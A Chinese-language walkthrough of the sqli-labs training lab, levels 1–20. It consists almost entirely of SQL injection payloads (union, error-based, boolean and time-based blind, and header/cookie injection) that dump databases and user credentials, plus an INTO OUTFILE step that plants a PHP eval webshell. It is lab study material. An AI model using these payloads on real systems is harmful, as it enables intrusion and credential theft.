sqli-labs通关笔记less1-20

GET参数类型(注入点在 URL 的 id 参数中,注释用 `--+`,`+` 经 URL 解码后变为空格,使 MySQL 的 `-- ` 注释生效):

Less-1:单引号闭合

方法一:联合注入

确认参数闭合类型:?id=1' --+
确认表中字段数量:?id=1' order by 3 --+ (逐步增大数字,直到报错为止,最后一个不报错的值即字段数)
确认页面回显位置:?id=-1' union select 1,2,3 --+
获取此数据库信息:?id=-1' union select 1,database(),current_user() --+
获取所有数据库名:?id=-1' union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1' union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1' union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1' union select 1,(group_concat(username,0x3a,password,0x3a,id)),3 from users --+ (用 0x3a 即冒号做分隔符,否则各字段会粘连在一起难以区分;后续关卡同理)

方法二:extractvalue报错注入(XPath 报错信息最多回显 32 个字符,数据较长时需配合 substr() 或 limit 分段读取)

判断参数闭合类型:?id=1' --+
获取此数据库信息:?id=-1' and (extractvalue(1,concat(0x7e,database(),0x7e))) --+
获取所有数据库名:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))) --+  
获取库中所有表名:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) --+   
获取表中所有字段:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))) --+
获取所有字段内容:?id=-1' and (extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e))) --+

方法三:updatexml报错注入(与 extractvalue 相同,报错回显限 32 个字符,过长需用 substr() 分段)

判断参数闭合类型:?id=1' --+
获取此数据库信息:?id=-1' and (updatexml(1,concat(0x7e,database(),0x7e),1)) --+   
获取所有数据库名:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)) --+     
获取库中所有表名:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) --+     
获取表中所有字段:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1)) --+
获取所有字段内容:?id=-1' and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)) --+

Less-2:数字型

联合注入

确认参数闭合类型:?id=1 --+
确认表中字段数量:?id=1 order by 3 --+
确认页面回显位置:?id=-1 union select 1,2,3 --+
获取此数据库信息:?id=-1 union select 1,database(),current_user() --+
获取所有数据库名:?id=-1 union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1 union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1 union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1 union select 1,(group_concat(username,id,password)),3 from users --+

Less-3:单引号+括号闭合

联合注入

确认参数闭合类型:?id=1') --+
确认表中字段数量:?id=1') order by 3 --+
确认页面回显位置:?id=-1') union select 1,2,3 --+
获取此数据库信息:?id=-1') union select 1,database(),current_user() --+
获取所有数据库名:?id=-1') union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1') union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1') union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1') union select 1,(group_concat(username,id,password)),3 from users --+

Less-4:双引号+括号闭合

联合注入

确认参数闭合类型:?id=1") --+
确认表中字段数量:?id=1") order by 3 --+
确认页面回显位置:?id=-1") union select 1,2,3 --+
获取此数据库信息:?id=-1") union select 1,database(),current_user() --+
获取所有数据库名:?id=-1") union select 1,(group_concat(schema_name)),3 from information_schema.schemata --+
获取库中所有表名:?id=-1") union select 1,(group_concat(table_name)),3 from information_schema.tables where table_schema='security' --+
获取表中所有字段:?id=-1") union select 1,(group_concat(column_name)),3 from information_schema.columns where table_name='users' --+
获取用户名和密码:?id=-1") union select 1,(group_concat(username,id,password)),3 from users --+

Less-5:单引号闭合

布尔盲注

判断数据库名长度:?id=1' and length(database())<9 --+
判断数据库的名称:?id=1' and ascii(substr(database(),1,1))=115 --+ (115 为字符 's' 的 ASCII 码,即库名 security 的首字母;依次改变 substr 的起始位置逐字符判断)
判断所有表名长度:?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13 --+
逐一判断表的名称:?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+
判断所有字段长度:?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+
逐一判断字段名称:?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99 --+
判断字段内容长度:?id=1' and length((select group_concat(username,password) from users))>109 --+
逐一判断字段内容:?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50 --+

Less-6:双引号闭合

布尔盲注

判断数据库名长度:?id=1" and length(database())<9 --+
判断数据库的名称:?id=1" and ascii(substr(database(),1,1))=115 --+
判断所有表名长度:?id=1" and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13 --+
逐一判断表的名称:?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+
判断所有字段长度:?id=1" and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+
逐一判断字段名称:?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99 --+
判断字段内容长度:?id=1" and length((select group_concat(username,password) from users))>109 --+
逐一判断字段内容:?id=1" and ascii(substr((select group_concat(username,password) from users),1,1))>50 --+

Less-7:单引号+双括号闭合

文件写入注入(union select ... into outfile)

确认参数闭合类型:?id=1')) --+

确认表中字段数量:?id=1')) order by 3 --+

尝试写入普通文件:?id=-1')) union select 1,2,3 into outfile '/var/www/html/Less-7/123.txt' --+

尝试写入木马文件:?id=-1')) union select "<?php @eval($_POST['cmd']);?>",2,3 into outfile '/var/www/html/Less-7/test.php' --+

前提条件:当前数据库用户需具有 FILE 权限,MySQL 的 secure_file_priv 未限制写入目录,且 mysqld 进程对目标 web 目录有写权限;本关页面无回显,需自行访问写入的文件确认是否成功。

Less-8:单引号闭合

布尔盲注

判断数据库名长度:?id=1' and length(database())<9 --+
判断数据库的名称:?id=1' and ascii(substr(database(),1,1))=115 --+
判断所有表名长度:?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13 --+
逐一判断表的名称:?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+
判断所有字段长度:?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+
逐一判断字段名称:?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99 --+
判断字段内容长度:?id=1' and length((select group_concat(username,password) from users))>109 --+
逐一判断字段内容:?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50 --+

Less-9:单引号闭合

时间盲注

判断参数闭合类型:?id=1' and if(1=1,sleep(3),1) --+
判断数据库名长度:?id=1' and if(length(database())=8,sleep(3),1) --+
判断数据库名字符:?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
判断所有表名长度:?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(3),1) --+
逐一判断所有表名:?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(3),1) --+
判断所有字段长度:?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(3),1) --+
逐一判断字段名称:?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(3),1) --+
判断字段内容长度:?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(3),1) --+
逐一判断字段内容:?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(3),1) --+

Less-10:双引号闭合

时间盲注

判断参数闭合类型:?id=1" and if(1=1,sleep(3),1) --+
判断数据库名长度:?id=1" and if(length(database())=8,sleep(3),1) --+
判断数据库名字符:?id=1" and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
判断所有表名长度:?id=1" and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(3),1) --+
逐一判断所有表名:?id=1" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(3),1) --+
判断所有字段长度:?id=1" and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(3),1) --+
逐一判断字段名称:?id=1" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(3),1) --+
判断字段内容长度:?id=1" and if(length((select group_concat(username,password) from users))>109,sleep(3),1) --+
逐一判断字段内容:?id=1" and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(3),1) --+

POST参数类型:

Less-11:单引号闭合

方法一:联合注入

判断账号闭合类型:1' 
判断页面是否回显:1' or 1=1 #
判断页面回显位置:1' union select 1,2 #
查看此数据库信息:1' union select database(),current_user() #
爆破所有数据库名:1' union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1' union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1' union select group_concat(username,id,password),2 from users #

方法二:extractvalue报错注入
判断参数闭合类型:1' #
获取此数据库信息:1' and (extractvalue(1,concat(0x7e,database(),0x7e))) #
获取所有数据库名:1' and (extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))) #  
获取库中所有表名:1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) # 
获取表中所有字段:1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))) #

方法三:updatexml报错注入
判断参数闭合类型:1' #
获取此数据库信息:1' and (updatexml(1,concat(0x7e,database(),0x7e),1)) #   
获取所有数据库名:1' and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)) #     
获取库中所有表名:1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)) #     
获取表中所有字段:1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1)) #

Less-12:双引号+括号闭合

联合注入

判断账号闭合类型:1") #
判断页面是否回显:1") or 1=1 #
判断页面回显位置:1") union select 1,2 #
查看此数据库信息:1") union select database(),current_user() #
爆破所有数据库名:1") union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1") union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1") union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1") union select group_concat(username,id,password),2 from users #

Less-13:单引号+括号闭合

联合注入

判断账号闭合类型:1') #
判断页面是否回显:1') or 1=1 #
判断页面回显位置:1') union select 1,2 #
查看此数据库信息:1') union select database(),current_user() #
爆破所有数据库名:1') union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1') union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1') union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1') union select group_concat(username,id,password),2 from users #

Less-14:双引号闭合

判断账号闭合类型:1" 
判断页面是否回显:1" or 1=1 #
判断页面回显位置:1" union select 1,2 #
查看此数据库信息:1" union select database(),current_user() #
爆破所有数据库名:1" union select group_concat(schema_name),2 from information_schema.schemata #
获取库中所有表名:1" union select group_concat(table_name),2 from information_schema.tables where table_schema='security' #
获取表中所有字段:1" union select group_concat(column_name),2 from information_schema.columns where table_name='users' #
获取用户名和密码:1" union select group_concat(username,id,password),2 from users #

Less-15:单引号闭合

布尔盲注(以登录成功/失败作为真假判断依据):payload 形式同 Less-5,放在 uname 字段,闭合用 `'`,以 `#` 结尾,例如 uname=1' or length(database())=8 #

Less-16:双引号+括号闭合

布尔盲注(以登录成功/失败作为真假判断依据):payload 形式同 Less-6,放在 uname 字段,闭合用 `")`,以 `#` 结尾,例如 uname=1") or length(database())=8 #

Less-17:单引号闭合

报错注入
判断参数闭合类型:1' #
获取此数据库信息:1' and (extractvalue(1,concat(0x7e,database(),0x7e))) #
获取所有数据库名:1' and (extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))) #  
获取库中所有表名:1' and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))) # 
获取表中所有字段:1' and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e))) #

Less-18:单引号闭合

报错注入

思路:页面上可以输入的账号和密码都不能注入,输入正确的账号密码登录后,会提示user-agent信息,用burpsuite测试User-Agent字段,发现会传三个参数,判断是header中的user-agent注入。

判断参数闭合类型:User-Agent:1',2,3) #
获取此数据库信息:User-Agent:1',2,(updatexml(1,concat(0x7e,database(),0x7e),1))) #
获取所有数据库名:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)))#
获取库中所有表名:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))) #
获取表中所有字段:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1))) #
获取所有字段内容:User-Agent:1',2,(updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))) #

Less-19:单引号闭合

报错注入

思路:页面上可以输入的账号和密码都不能注入,输入正确的账号密码登录后,会提示referer信息,用burpsuite测试Referer字段,发现会传两个参数,判断是header中的referer注入。

判断参数闭合类型:Referer:1',2) #
获取此数据库信息:Referer:1',(updatexml(1,concat(0x7e,database(),0x7e),1))) #
获取所有数据库名:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)))#
获取库中所有表名:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))) #
获取表中所有字段:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1))) #
获取所有字段内容:Referer:1',(updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))) #

Less-20:单引号闭合

报错注入

思路:页面上可以输入的账号和密码都不能注入,输入正确的账号密码登录后,提示删除cookie,用burpsuite测试cookie字段,发现uname参数可以触发报错,判断是header中的cookie注入。

判断参数闭合类型:Cookie: uname=1' #
获取此数据库信息:Cookie: uname=1' and updatexml(1,concat(0x7e,database(),0x7e),1) #
获取所有数据库名:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) #
获取库中所有表名:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#
获取表中所有字段:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x7e),1) #
获取所有字段内容:Cookie: uname=1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)#
